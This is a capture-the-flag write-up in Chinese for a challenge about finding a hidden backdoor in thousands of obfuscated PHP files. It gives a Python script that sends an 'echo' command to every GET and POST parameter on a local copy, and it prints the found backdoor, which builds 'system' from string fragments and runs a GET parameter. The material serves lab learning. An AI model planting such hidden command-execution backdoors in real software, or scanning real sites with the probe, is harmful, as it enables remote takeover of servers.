题目环境:https://buuoj.cn/challenges#%E9%AB%98%E6%98%8E%E7%9A%84%E9%BB%91%E5%AE%A2
题目说该网站被黑了,并给出了源码,有三千多个文件,而且里面的变量名字符串都是没有意义的,结合题目的名字还有说明可以猜测这是是要去找源码中隐藏的后门
代码中有很多eval,system这样的函数,但都是不能传入代码或者命令
1 2 $_GET['jVMcNhK_F' ] = ' ' ; system($_GET['jVMcNhK_F' ] ?? ' ' );
1 2 if ('V8dfwnVA5' == 'n3Ofh5nSW' )system($_POST['V8dfwnVA5' ] ?? ' ' );
代码量很大,如果一个一个去找的话眼睛都瞎了,而且其实还找不到…
如果返回的html中有xxx就是可以利用的后门
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 from multiprocessing import Poolimport osimport requestspath = "D:\\phpstudy\\PHPTutorial\\WWW\\src" files = os.listdir(path) url = "http://127.0.0.1/src/" def dealfiles (start,end) : for i in range(start,end): readfile(files[i]) def readfile (filename) : with open(path+"\\" +filename,"r" ) as f: lines = f.readlines() for line in lines: start_pos = line.find("$_GET['" ) if (start_pos != -1 ): start_pos += len("$_GET['" ) end_pos = line.find("'" ,start_pos) get = line[start_pos:end_pos] findget(filename,get) start_pos = line.find("$_POST['" ) if (start_pos != -1 ): start_pos += len("$_POST['" ) end_pos = line.find("'" ,start_pos) post = line[start_pos:end_pos] findpost(filename,post) def findget (filename,get) : response = requests.get(url+filename+"?" +get+"=echo 'wxynb'" ) if (str(response.content).find("wxynb" )!=-1 ): print(url+filename+"?" +get+"=echo 'wxynb'" ) def findpost (filename,post) : data = {post:"echo 'wxynb'" } response = requests.post(url+filename,data=data) if (str(response.content).find("wxynb" )!=-1 ): print(url+filename) if __name__=='__main__' : p = Pool(8 ) length = int(len(files)/8 ) for i in range(0 ,len(files),length): p.apply_async(dealfiles,(i,i+length)) p.close() p.join() print('All subprocesses done.' )
最后发现后门在xk0SzyKwfzw.php的get参数Efa5BVG
1 2 3 4 5 6 7 $XnEGfa = $_GET['Efa5BVG' ] ?? ' ' ; $aYunX = "sY" ; $aYunX .= "stEmXnsTcx" ; $aYunX = explode('Xn' , $aYunX); $kDxfM = new stdClass(); $kDxfM->gHht = $aYunX[0 ]; ($kDxfM->gHht)($XnEGfa);
藏得还是比较深的,如果一个一个危险函数去找也找不到